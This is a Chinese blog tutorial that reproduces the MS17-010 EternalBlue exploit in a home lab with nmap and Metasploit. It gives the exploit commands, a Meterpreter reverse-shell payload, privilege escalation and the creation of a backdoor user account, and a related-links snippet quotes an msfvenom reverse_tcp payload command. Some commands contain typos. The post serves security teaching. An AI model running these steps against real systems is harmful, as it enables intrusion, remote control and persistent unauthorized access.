MS17-010永恒之蓝漏洞复现

最新推荐文章于 2024-05-03 02:58:08 发布
最新推荐文章于 2024-05-03 02:58:08 发布
阅读量217 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43923136/article/details/132795087
版权

文章目录

前言

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。

原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

准备工作

  • 靶机:Windows 7 (IP:192.168.43.215)
  • 攻击机:Kali-Linux-2021 (IP:192.168.43.77)
  • 工具:Nmap、metasploit(msf)
  • kali-Linux-2021与Windows 7能够相互ping通;Windows 7靶机不要打补丁

漏洞复现

01 使用攻击机kali ping靶机windows 7 测试连通性

ping  192.168.43.215 -c 3

在这里插入图片描述

02 使用nmap工具探测靶机的开放端口和系统版本

nmap -sV 192.168.43.215

在这里插入图片描述
如上图可以发现445端口处于开放状态

03 启动kali自带的msf工具

msfconsole

04 搜索永恒之蓝漏洞可使用的攻击模块

search 17_010

在这里插入图片描述
编号0为永恒之蓝漏洞的攻击模块;编号3为永恒之蓝的扫描模块,用于验证漏洞是否存在。

05 使用永恒之蓝扫描模块来验证漏洞是否存在

use 3

在这里插入图片描述

06 查看永恒之蓝扫描模块的配置项

show options

在这里插入图片描述
如上图所示只需配置RHOSTS (目标靶机)即可。

07 配置目标靶机并使用exploit或run命令进行检测,显示靶机存在永恒之蓝漏洞

set rhosts 192.168.43.215   #设置目标靶机IP
exoloit   #验证漏洞

在这里插入图片描述

08 使用永恒之蓝漏洞攻击模块

use 0     #使用攻击模块
show options   #查看配置项

在这里插入图片描述
如上图所示需要配置目标靶机IP和攻击载荷。

09 配置目标靶机和攻击载荷

set rhost 192.168.43.215   #设置靶机ip
set payload Windows/x64/meterpreter/severse_tcp   #配置攻击载荷并且使用反向连接

在这里插入图片描述

10 最后开始攻击

run

在这里插入图片描述
显示WIN则代表攻击成功。

11 后渗透操作

getuid   #查看当前用户权限

可以看到是普通权限,如下图所示:
在这里插入图片描述

getsystem    #提权

在这里插入图片描述

shell   #进入shell

在这里插入图片描述

chcp 65001  #改变当前的编码为UTF-8,防止显示乱码

在这里插入图片描述

net user test 123456.. /add   #对靶机新建一个后门用户

在这里插入图片描述

修复方案

关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。

总结

为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。

瞬间H
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
ms17-010永恒之蓝漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
ms17-010永恒之蓝漏洞复现
Filotimo_的博客
09-09 2227
ms17-010永恒之蓝)利用的端口是445端口。本文主要讲解ms17-010永恒之蓝漏洞复现
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
最新发布
2401_84297796的博客
05-03 966
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4058
ms17-010永恒之蓝漏洞复现
永恒之蓝_CVE-2017-0143_漏洞复现/验证
18年开始,学2.5年编程(C、JAVA),学2.5年网络(RS、WLAN),现在来到2023年,转行网络安全。
03-06 1405
永恒之蓝CVE-2017-0143,漏洞验证/复现
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 7537
ms17-010漏洞利用(本地环境复现)
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之蓝ms17010漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
永恒之蓝检查工具
10-26
永恒之蓝检查工具
永恒之蓝检测工具
09-06
简单易用,小巧无毒,可以对大段IP进行扫描,也可以指定IP
Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010
薛定谔嘚喵博客
04-25 2539
攻击机:Linux kali(IP:192.168.107.129)靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
永恒之蓝漏洞复现
m0_75178803的博客
06-11 417
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
Windows下的MS17-010永恒之蓝漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
ms17-010 永恒之蓝
qq_62803993的博客
01-12 3756
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
“庖丁解牛”细说“永恒之蓝
m0_58231750的博客
07-10 3585
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB(全称是Server Message Block)是一个协议服务器信...
[永恒之蓝]实战-漏洞复现
流浪法师的博客
02-24 4819
[永恒之蓝]实战-漏洞复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值